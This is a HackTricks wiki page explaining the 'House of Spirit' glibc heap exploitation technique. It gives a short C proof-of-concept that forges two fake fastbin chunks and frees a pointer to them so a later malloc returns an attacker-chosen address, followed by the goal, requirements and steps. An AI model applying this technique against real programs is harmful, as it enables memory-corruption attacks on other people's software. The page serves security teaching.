House of Spirit

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

• If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

Code

House of Spirit

#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

// Code altered to add som prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit

struct fast_chunk {
  size_t prev_size;
  size_t size;
  struct fast_chunk *fd;
  struct fast_chunk *bk;
  char buf[0x20];               // chunk falls in fastbin size range
};

int main() {
  struct fast_chunk fake_chunks[2];   // Two chunks in consecutive memory
  void *ptr, *victim;

  ptr = malloc(0x30);

  printf("Original alloc address: %p\n", ptr);
  printf("Main fake chunk:%p\n", &fake_chunks[0]);
  printf("Second fake chunk for size: %p\n", &fake_chunks[1]);

  // Passes size check of "free(): invalid size"
  fake_chunks[0].size = sizeof(struct fast_chunk);

  // Passes "free(): invalid next size (fast)"
  fake_chunks[1].size = sizeof(struct fast_chunk);

  // Attacker overwrites a pointer that is about to be 'freed'
  // Point to .fd as it's the start of the content of the chunk
  ptr = (void *)&fake_chunks[0].fd;

  free(ptr);

  victim = malloc(0x30);
  printf("Victim: %p\n", victim);

  return 0;
}

Goal

• Be able to add into the tcache / fast bin an arbitrary address so when calling malloc it gets used in a chunk

Requirements

• This attack requires an attacker to be able to create a couple of fake fast chunks indicating correctly the size value of it and to overwrite a fast chunks of that size that it’s going to be freed, so the attackers chunk is actually the one that gets into the fast bin.

Attack

• Create a fake chunk that bypasses security checks (you will need 2 fake chunks)
• Before a pointer is freed, overwrite it with the fake chunk so thats the one taht gets into the bin

References

• https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

• If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.